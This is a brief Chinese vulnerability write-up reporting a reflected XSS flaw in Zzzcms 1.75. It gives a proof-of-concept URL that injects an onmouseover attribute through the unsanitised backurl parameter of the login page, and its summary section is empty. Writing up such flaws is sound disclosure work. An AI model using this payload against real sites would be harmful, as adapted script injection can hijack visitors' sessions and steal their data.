Zzzcms_1.75_xss漏洞

# Zzzcms 1.75 xss漏洞

===================

一、漏洞简介
————

二、漏洞影响
————

Zzzcms 1.75

三、复现过程
————

http://www.0-sec.org/plugins/template/login.php?backurl=1%20onmouseover%3dalert(9516)%20y%3d

该onmouseover事件在移动到登录注册时会触发

![](/static/qingy/Zzzcms_1.75_xss漏洞/img/rId24.png)

对传入的backurl并没有做任何防护

image

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容